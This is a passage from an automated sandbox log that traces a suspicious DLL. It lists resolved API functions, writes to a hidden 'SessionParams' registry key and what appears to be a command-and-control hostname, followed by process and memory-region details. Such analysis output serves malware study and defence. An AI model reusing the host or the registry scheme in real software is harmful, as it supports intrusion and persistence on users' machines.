param_1=0x72f1e648, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\") returned 38 [0034.292] wsprintfA (in: param_1=0x72f1e544, param_2="%s\\%s\\" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\") returned 48 [0034.292] GetTempPathA (in: nBufferLength=0x104, lpBuffer=0x72f1e954 | out: lpBuffer="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\") returned 0x24 [0034.292] wsprintfA (in: param_1=0x1ef008, param_2="%s%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.292] lstrlenA (lpString="C:\\Windows\\system32\\win.com") returned 27 [0034.292] wsprintfA (in: param_1=0x1eef04, param_2="%s" | out: param_1="C:\\Windows\\system32\\win.com") returned 27 [0034.292] CreateFileA (lpFileName="C:\\Windows\\system32\\win.com" (normalized: "c:\\windows\\system32\\win.com"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.292] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f1ec68, lpLastAccessTime=0x72f1ec70, lpLastWriteTime=0x72f1ec78 | out: lpCreationTime=0x72f1ec68*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastAccessTime=0x72f1ec70*(dwLowDateTime=0x91a090ed, dwHighDateTime=0x1ca0410), lpLastWriteTime=0x72f1ec78*(dwLowDateTime=0x91a073c0, dwHighDateTime=0x1ca0410)) returned 1 [0034.293] CloseHandle (hObject=0x74) returned 1 [0034.293] GetLastError () returned 0x0 [0034.293] wsprintfA (in: param_1=0x72f1ea58, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\msvcrtd.tlb") returned 59 [0034.293] GetLastError () returned 0x0 [0034.293] wsprintfA (in: param_1=0x72f1eb5c, param_2="%s%s" | out: param_1="C:\\Users\\EEBsYm5\\AppData\\Roaming\\HELP\\\\system32\\mskfp32.ocx") returned 59 [0034.293] GetSystemDirectoryA (in: lpBuffer=0x1ef008, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0034.293] CreateFileA (lpFileName="C:\\Windows\\system32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x74 [0034.293] GetFileTime (in: hFile=0x74, lpCreationTime=0x72f2012c, lpLastAccessTime=0x72f20134, lpLastWriteTime=0x72f2013c | out: lpCreationTime=0x72f2012c*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastAccessTime=0x72f20134*(dwLowDateTime=0x8afecd30, dwHighDateTime=0x1d2f57c), lpLastWriteTime=0x72f2013c*(dwLowDateTime=0xe2a45800, dwHighDateTime=0x1cb887a)) returned 1 [0034.293] CloseHandle (hObject=0x74) returned 1 [0034.293] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.293] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.293] LoadLibraryA (lpLibFileName="ws2_32.dll") returned 0x77510000 [0034.295] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x761d0000 [0034.295] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76700000 [0034.295] LoadLibraryA (lpLibFileName="msvcrt.dll") returned 0x77720000 [0034.295] LoadLibraryA (lpLibFileName="user32.dll") returned 0x77ad0000 [0034.295] GetProcAddress (hModule=0x77510000, lpProcName="WSAStartup") returned 0x77513ab2 [0034.296] GetProcAddress (hModule=0x77510000, lpProcName="WSACleanup") returned 0x77513c5f [0034.296] GetProcAddress (hModule=0x77510000, lpProcName="gethostbyname") returned 0x77527673 [0034.296] GetProcAddress (hModule=0x77510000, lpProcName="inet_ntoa") returned 0x7751b131 [0034.296] GetProcAddress (hModule=0x761d0000, lpProcName="CreateFileA") returned 0x7621cee8 [0034.296] GetProcAddress (hModule=0x761d0000, lpProcName="WriteFile") returned 0x76221400 [0034.296] GetProcAddress (hModule=0x761d0000, lpProcName="CloseHandle") returned 0x7621ca7c [0034.296] GetProcAddress (hModule=0x761d0000, lpProcName="FindFirstFileA") returned 0x76222d89 [0034.296] GetProcAddress (hModule=0x761d0000, lpProcName="FindNextFileA") returned 0x7621a187 [0034.296] GetProcAddress (hModule=0x761d0000, lpProcName="FindClose") returned 0x76220e62 [0034.296] GetProcAddress (hModule=0x761d0000, lpProcName="DeleteFileA") returned 0x762147cb [0034.296] GetProcAddress (hModule=0x761d0000, lpProcName="FileTimeToSystemTime") returned 0x76221dfe [0034.296] GetProcAddress (hModule=0x761d0000, lpProcName="SetFilePointer") returned 0x7621db36 [0034.296] GetProcAddress (hModule=0x761d0000, lpProcName="CreateProcessA") returned 0x761d2082 [0034.296] GetProcAddress (hModule=0x761d0000, lpProcName="WaitForSingleObject") returned 0x7621ba90 [0034.296] GetProcAddress (hModule=0x761d0000, lpProcName="ReadFile") returned 0x762196fb [0034.296] GetProcAddress (hModule=0x761d0000, lpProcName="CreateEventW") returned 0x76223386 [0034.297] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemDirectoryA") returned 0x76218fc5 [0034.297] GetProcAddress (hModule=0x761d0000, lpProcName="GetWindowsDirectoryW") returned 0x762104b6 [0034.297] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathA") returned 0x76236a65 [0034.297] GetProcAddress (hModule=0x761d0000, lpProcName="GetTempPathW") returned 0x76208b33 [0034.297] GetProcAddress (hModule=0x761d0000, lpProcName="GetLocalTime") returned 0x7621a90e [0034.297] GetProcAddress (hModule=0x761d0000, lpProcName="GetComputerNameW") returned 0x762103ff [0034.297] GetProcAddress (hModule=0x761d0000, lpProcName="GetSystemInfo") returned 0x76223728 [0034.297] GetProcAddress (hModule=0x761d0000, lpProcName="GetVersionExW") returned 0x76213b1a [0034.297] GetProcAddress (hModule=0x761d0000, lpProcName="GetEnvironmentVariableA") returned 0x7621ce2e [0034.297] GetProcAddress (hModule=0x761d0000, lpProcName="CopyFileA") returned 0x7623532c [0034.297] GetProcAddress (hModule=0x761d0000, lpProcName="GetLastError") returned 0x7621bf00 [0034.297] GetProcAddress (hModule=0x761d0000, lpProcName="SetFileAttributesA") returned 0x76208cb9 [0034.297] GetProcAddress (hModule=0x761d0000, lpProcName="GetFileSize") returned 0x76210273 [0034.297] GetProcAddress (hModule=0x761d0000, lpProcName="CreateDirectoryA") returned 0x762368da [0034.297] GetProcAddress (hModule=0x761d0000, lpProcName="TerminateProcess") returned 0x76212331 [0034.297] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryW") returned 0x76223c01 [0034.298] GetProcAddress (hModule=0x761d0000, lpProcName="GetProcAddress") returned 0x762233d3 [0034.298] GetProcAddress (hModule=0x761d0000, lpProcName="LoadLibraryA") returned 0x7622395c [0034.298] GetProcAddress (hModule=0x761d0000, lpProcName="MultiByteToWideChar") returned 0x7622452b [0034.298] GetProcAddress (hModule=0x76700000, lpProcName="RegCreateKeyExA") returned 0x76711469 [0034.298] GetProcAddress (hModule=0x76700000, lpProcName="RegEnumValueA") returned 0x7670cf49 [0034.298] GetProcAddress (hModule=0x76700000, lpProcName="RegDeleteValueA") returned 0x7672a4ea [0034.298] GetProcAddress (hModule=0x76700000, lpProcName="RegCloseKey") returned 0x7671469d [0034.298] GetProcAddress (hModule=0x77720000, lpProcName="memset") returned 0x77729790 [0034.298] GetProcAddress (hModule=0x77720000, lpProcName="memcpy") returned 0x77729910 [0034.298] GetProcAddress (hModule=0x77720000, lpProcName="memcmp") returned 0x77737975 [0034.298] GetProcAddress (hModule=0x77720000, lpProcName="malloc") returned 0x77729cee [0034.298] GetProcAddress (hModule=0x77720000, lpProcName="free") returned 0x77729894 [0034.298] GetProcAddress (hModule=0x77720000, lpProcName="strchr") returned 0x7772dbeb [0034.298] GetProcAddress (hModule=0x77720000, lpProcName="strncpy") returned 0x777308a9 [0034.298] GetProcAddress (hModule=0x77720000, lpProcName="atoi") returned 0x7772dbe0 [0034.298] GetProcAddress (hModule=0x77720000, lpProcName="_snwprintf") returned 0x777495d1 [0034.299] GetProcAddress (hModule=0x77720000, lpProcName="strncat") returned 0x77750909 [0034.299] GetProcAddress (hModule=0x77720000, lpProcName="strstr") returned 0x7772de4a [0034.299] GetProcAddress (hModule=0x77720000, lpProcName="strlen") returned 0x777343d3 [0034.299] GetProcAddress (hModule=0x77720000, lpProcName="strrchr") returned 0x7772dbae [0034.299] GetProcAddress (hModule=0x77720000, lpProcName="_snprintf") returned 0x7774fa7c [0034.299] GetProcAddress (hModule=0x77ad0000, lpProcName="OemToCharA") returned 0x77b2f041 [0034.299] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfA") returned 0x77ae3f47 [0034.299] GetProcAddress (hModule=0x77ad0000, lpProcName="wsprintfW") returned 0x77af426d [0034.299] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e134, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.299] GetModuleFileNameW (in: hModule=0x72ee0000, lpFilename=0x72f1e238, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.299] GetModuleFileNameA (in: hModule=0x72ee0000, lpFilename=0x72f1e440, nSize=0x104 | out: lpFilename="C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll")) returned 0x25 [0034.299] OpenEventA (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="97ryuhf023") returned 0x74 [0034.318] AddAtomT () returned 0x0 [0034.318] RegCreateKeyExA (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1ef53c, lpdwDisposition=0x1ef540 | out: phkResult=0x1ef53c*=0x78, lpdwDisposition=0x1ef540*=0x2) returned 0x0 [0034.318] CloseHandle (hObject=0x78) returned 1 [0034.318] SendMessageA (hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x0 [0034.318] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x1ef588, lpdwDisposition=0x1ef640 | out: phkResult=0x1ef588*=0x7c, lpdwDisposition=0x1ef640*=0x2) returned 0x0 [0034.318] RegQueryValueExA (in: hKey=0x7c, lpValueName="Timout", lpReserved=0x0, lpType=0x1ef58c, lpData=0x72f1ed94, lpcbData=0x1ef584*=0x4 | out: lpType=0x1ef58c*=0x0, lpData=0x72f1ed94*=0x0, lpcbData=0x1ef584*=0x4) returned 0x2 [0034.318] RegQueryValueExA (in: hKey=0x7c, lpValueName="IsActive", lpReserved=0x0, lpType=0x1ef58c, lpData=0x72f1ed98, lpcbData=0x1ef584*=0x4 | out: lpType=0x1ef58c*=0x0, lpData=0x72f1ed98*=0x0, lpcbData=0x1ef584*=0x4) returned 0x2 [0034.318] RegQueryValueExA (in: hKey=0x7c, lpValueName="BSlp", lpReserved=0x0, lpType=0x1ef58c, lpData=0x72f1ed9c, lpcbData=0x1ef584*=0x4 | out: lpType=0x1ef58c*=0x0, lpData=0x72f1ed9c*=0x0, lpcbData=0x1ef584*=0x4) returned 0x2 [0034.318] RegQueryValueExA (in: hKey=0x7c, lpValueName="SDCnt", lpReserved=0x0, lpType=0x1ef58c, lpData=0x72f1eda4, lpcbData=0x1ef584*=0x4 | out: lpType=0x1ef58c*=0x0, lpData=0x72f1eda4*=0x0, lpcbData=0x1ef584*=0x4) returned 0x2 [0034.318] RegQueryValueExA (in: hKey=0x7c, lpValueName="LastValue", lpReserved=0x0, lpType=0x1ef58c, lpData=0x72f1eda8, lpcbData=0x1ef584*=0x4 | out: lpType=0x1ef58c*=0x0, lpData=0x72f1eda8*=0x0, lpcbData=0x1ef584*=0x4) returned 0x2 [0034.318] RegQueryValueExA (in: hKey=0x7c, lpValueName="Id", lpReserved=0x0, lpType=0x1ef58c, lpData=0x72f1edb8, lpcbData=0x1ef584*=0x8 | out: lpType=0x1ef58c*=0x3, lpData=0x72f1edb8*, lpcbData=0x1ef584*=0x8) returned 0x0 [0034.318] RegQueryValueExA (in: hKey=0x7c, lpValueName="StVal", lpReserved=0x0, lpType=0x1ef58c, lpData=0x72f1edc0, lpcbData=0x1ef584*=0x4 | out: lpType=0x1ef58c*=0x4, lpData=0x72f1edc0*=0x1, lpcbData=0x1ef584*=0x4) returned 0x0 [0034.319] RegQueryValueExA (in: hKey=0x7c, lpValueName="EmtParam", lpReserved=0x0, lpType=0x1ef58c, lpData=0x72f1edc4, lpcbData=0x1ef584*=0x4 | out: lpType=0x1ef58c*=0x0, lpData=0x72f1edc4*=0x0, lpcbData=0x1ef584*=0x4) returned 0x2 [0034.319] RegQueryValueExA (in: hKey=0x7c, lpValueName="HtParam", lpReserved=0x0, lpType=0x1ef58c, lpData=0x72f1edc8, lpcbData=0x1ef584*=0x4 | out: lpType=0x1ef58c*=0x4, lpData=0x72f1edc8*=0xe10, lpcbData=0x1ef584*=0x4) returned 0x0 [0034.319] RegQueryValueExA (in: hKey=0x7c, lpValueName="CMValue", lpReserved=0x0, lpType=0x1ef58c, lpData=0x72f1edcc, lpcbData=0x1ef584*=0x4 | out: lpType=0x1ef58c*=0x4, lpData=0x72f1edcc*=0x0, lpcbData=0x1ef584*=0x4) returned 0x0 [0034.319] RegQueryValueExA (in: hKey=0x7c, lpValueName="ILevelCount", lpReserved=0x0, lpType=0x1ef58c, lpData=0x72f1edd0, lpcbData=0x1ef584*=0x4 | out: lpType=0x1ef58c*=0x4, lpData=0x72f1edd0*=0x1, lpcbData=0x1ef584*=0x4) returned 0x0 [0034.319] RegQueryValueExA (in: hKey=0x7c, lpValueName="IListLen", lpReserved=0x0, lpType=0x1ef58c, lpData=0x72f1eddc, lpcbData=0x1ef584*=0x4 | out: lpType=0x1ef58c*=0x0, lpData=0x72f1eddc*=0x0, lpcbData=0x1ef584*=0x4) returned 0x2 [0034.319] RegQueryValueExA (in: hKey=0x7c, lpValueName="IList", lpReserved=0x0, lpType=0x1ef58c, lpData=0x330b28, lpcbData=0x1ef584*=0x200 | out: lpType=0x1ef58c*=0x0, lpData=0x330b28*=0x0, lpcbData=0x1ef584*=0x200) returned 0x2 [0034.319] RegQueryValueExA (in: hKey=0x7c, lpValueName="Installed", lpReserved=0x0, lpType=0x1ef58c, lpData=0x72f1eef0, lpcbData=0x1ef584*=0x4 | out: lpType=0x1ef58c*=0x0, lpData=0x72f1eef0*=0x1, lpcbData=0x1ef584*=0x4) returned 0x2 [0034.319] RegQueryValueExA (in: hKey=0x7c, lpValueName="IPlace", lpReserved=0x0, lpType=0x1ef58c, lpData=0x330d30, lpcbData=0x1ef584*=0x64 | out: lpType=0x1ef58c*=0x3, lpData=0x330d30*, lpcbData=0x1ef584*=0x2) returned 0x0 [0034.319] lstrlenA (lpString=" ") returned 1 [0034.319] RegQueryValueExA (in: hKey=0x7c, lpValueName="ISFValue", lpReserved=0x0, lpType=0x1ef58c, lpData=0x72f1edec, lpcbData=0x1ef584*=0x104 | out: lpType=0x1ef58c*=0x3, lpData=0x72f1edec*, lpcbData=0x1ef584*=0x0) returned 0x0 [0034.319] RegQueryValueExA (in: hKey=0x7c, lpValueName="LastId", lpReserved=0x0, lpType=0x1ef58c, lpData=0x72f1eef4, lpcbData=0x1ef584*=0x8 | out: lpType=0x1ef58c*=0x0, lpData=0x72f1eef4*=0x0, lpcbData=0x1ef584*=0x8) returned 0x2 [0034.319] RegQueryValueExA (in: hKey=0x7c, lpValueName="NTries", lpReserved=0x0, lpType=0x1ef58c, lpData=0x72f1eefc, lpcbData=0x1ef584*=0x4 | out: lpType=0x1ef58c*=0x0, lpData=0x72f1eefc*=0x0, lpcbData=0x1ef584*=0x4) returned 0x2 [0034.319] RegQueryValueExA (in: hKey=0x7c, lpValueName="IMValue", lpReserved=0x0, lpType=0x1ef58c, lpData=0x72f1ef00, lpcbData=0x1ef584*=0x4 | out: lpType=0x1ef58c*=0x0, lpData=0x72f1ef00*=0x0, lpcbData=0x1ef584*=0x4) returned 0x2 [0034.319] RegQueryValueExA (in: hKey=0x7c, lpValueName="LCValue", lpReserved=0x0, lpType=0x1ef58c, lpData=0x72f1eda0, lpcbData=0x1ef584*=0x4 | out: lpType=0x1ef58c*=0x0, lpData=0x72f1eda0*=0x0, lpcbData=0x1ef584*=0x4) returned 0x2 [0034.319] RegCloseKey (hKey=0x7c) returned 0x0 [0034.319] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x1ef648 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x1ef648*=0x2) returned 0x0 [0034.320] RegSetValueExA (in: hKey=0x7c, lpValueName="HtParam", Reserved=0x0, dwType=0x4, lpData=0x72f1edc8*=0x1c20, cbData=0x4 | out: lpData=0x72f1edc8*=0x1c20) returned 0x0 [0034.320] GetLastError () returned 0x0 [0034.320] RegCloseKey (hKey=0x7c) returned 0x0 [0034.320] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x1ef658 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x1ef658*=0x2) returned 0x0 [0034.320] RegSetValueExA (in: hKey=0x7c, lpValueName="StVal", Reserved=0x0, dwType=0x4, lpData=0x72f1edc0*=0x0, cbData=0x4 | out: lpData=0x72f1edc0*=0x0) returned 0x0 [0034.320] RegCloseKey (hKey=0x7c) returned 0x0 [0034.320] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x1ef648 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x1ef648*=0x2) returned 0x0 [0034.320] RegSetValueExA (in: hKey=0x7c, lpValueName="CMValue", Reserved=0x0, dwType=0x4, lpData=0x72f1edcc*=0x0, cbData=0x4 | out: lpData=0x72f1edcc*=0x0) returned 0x0 [0034.320] RegCloseKey (hKey=0x7c) returned 0x0 [0034.320] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x1ef644 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x1ef644*=0x2) returned 0x0 [0034.320] RegSetValueExA (in: hKey=0x7c, lpValueName="ILevelCount", Reserved=0x0, dwType=0x4, lpData=0x72f1edd0*=0x1, cbData=0x4 | out: lpData=0x72f1edd0*=0x1) returned 0x0 [0034.320] RegCloseKey (hKey=0x7c) returned 0x0 [0034.320] GetLastError () returned 0x0 [0034.320] GetLastError () returned 0x0 [0034.320] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0034.321] lstrlenA (lpString="00") returned 2 [0034.321] lstrlenA (lpString="/00/") returned 4 [0034.321] wsprintfA (in: param_1=0x330da0, param_2="%s" | out: param_1="weather-online.hopto.org") returned 24 [0034.321] wsprintfA (in: param_1=0x330dc8, param_2="%s" | out: param_1="00") returned 2 [0034.321] wsprintfA (in: param_1=0x3326e8, param_2="%s" | out: param_1="/00/") returned 4 [0034.321] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0034.321] lstrlenA (lpString="weather-online.hopto.org") returned 24 [0034.321] RegCreateKeyExA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\SessionParams", Reserved=0x0, lpClass="", dwOptions=0x0, samDesired=0xf003f, lpSecurityAttributes=0x0, phkResult=0x72f1ed90, lpdwDisposition=0x1ef644 | out: phkResult=0x72f1ed90*=0x7c, lpdwDisposition=0x1ef644*=0x2) returned 0x0 [0034.321] RegSetValueExA (in: hKey=0x7c, lpValueName="IPlace", Reserved=0x0, dwType=0x3, lpData=0x330d30*, cbData=0x64 | out: lpData=0x330d30*) returned 0x0 [0034.321] RegCloseKey (hKey=0x7c) returned 0x0 [0034.323] HeapDestroy (hHeap=0x330000) returned 1 Process: id = "44" image_name = "gorctexxzx.exe" filename = "c:\\windows\\system32\\gorctexxzx.exe" page_root = "0x7ef4fae0" os_pid = "0xc8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xa3c" cmd_line = "\"C:\\Windows\\System32\\goRcteXxZX.exe\" /dll=\"C:\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL\" /fn_id=DllCanUnloadNow /fn_args=\"127.0.0.1\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f0e7" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1970 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1971 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1972 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1973 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 1974 start_va = 0x11d0000 end_va = 0x11f0fff entry_point = 0x11d0000 region_type = mapped_file name = "gorctexxzx.exe" filename = "\\Windows\\System32\\goRcteXxZX.exe" (normalized: "c:\\windows\\system32\\gorctexxzx.exe") Region: id = 1975 start_va = 0x77e80000 end_va = 0x77e80fff entry_point = 0x77e80000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 1976 start_va = 0x77ec0000 end_va = 0x77ffbfff entry_point = 0x77ec0000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1977 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 1978 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 1979 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 1980 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1981 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1982 start_va = 0x370000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 1983 start_va = 0x640000 end_va = 0x64ffff entry_point = 0x0 region_type = private name = "private_0x0000000000640000" filename = "" Region: id = 1984 start_va = 0x75f70000 end_va = 0x75fb9fff entry_point = 0x75f70000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1985 start_va = 0x761d0000 end_va = 0x762a3fff entry_point = 0x761d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1986 start_va = 0x76300000 end_va = 0x76356fff entry_point = 0x76300000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1987 start_va = 0x765f0000 end_va = 0x765f9fff entry_point = 0x765f0000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 1988 start_va = 0x767a0000 end_va = 0x773e9fff entry_point = 0x767a0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1989 start_va = 0x773f0000 end_va = 0x7748cfff entry_point = 0x773f0000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 1990 start_va = 0x77550000 end_va = 0x775f0fff entry_point = 0x77550000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1991 start_va = 0x77720000 end_va = 0x777cbfff entry_point = 0x77720000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1992 start_va = 0x77970000 end_va = 0x77acbfff entry_point = 0x77970000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1993 start_va = 0x77ad0000 end_va = 0x77b98fff entry_point = 0x77ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1994 start_va = 0x77c80000 end_va = 0x77ccdfff entry_point = 0x77c80000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1995 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 1996 start_va = 0x210000 end_va = 0x2d7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000210000" filename = "" Region: id = 1997 start_va = 0x762b0000 end_va = 0x762cefff entry_point = 0x762b0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1998 start_va = 0x77ba0000 end_va = 0x77c6bfff entry_point = 0x77ba0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 1999 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 2000 start_va = 0xc0000 end_va = 0xc0fff entry_point = 0x0 region_type = private name = "private_0x00000000000c0000" filename = "" Region: id = 2001 start_va = 0x470000 end_va = 0x570fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000470000" filename = "" Region: id = 2002 start_va = 0x1200000 end_va = 0x1dfffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001200000" filename = "" Region: id = 2003 start_va = 0x72db0000 end_va = 0x72db2fff entry_point = 0x72db0000 region_type = mapped_file name = "api-ms-win-core-synch-l1-2-0.dll" filename = "\\Windows\\System32\\api-ms-win-core-synch-l1-2-0.dll" (normalized: "c:\\windows\\system32\\api-ms-win-core-synch-l1-2-0.dll") Region: id = 2004 start_va = 0x72ee0000 end_va = 0x72f24fff entry_point = 0x72ee0000 region_type = mapped_file name = "97328f~1.dll" filename = "\\Users\\EEBsYm5\\Desktop\\97328F~1.DLL" (normalized: "c:\\users\\eebsym5\\desktop\\97328f~1.dll") Region: id = 2005 start_va = 0x762e0000 end_va = 0x762f8fff entry_point = 0x762e0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2006 start_va = 0x76700000 end_va = 0x7679ffff entry_point = 0x76700000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2007 start_va = 0xd0000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x00000000000d0000" filename = "" Region: id = 2008 start_va = 0x77510000 end_va = 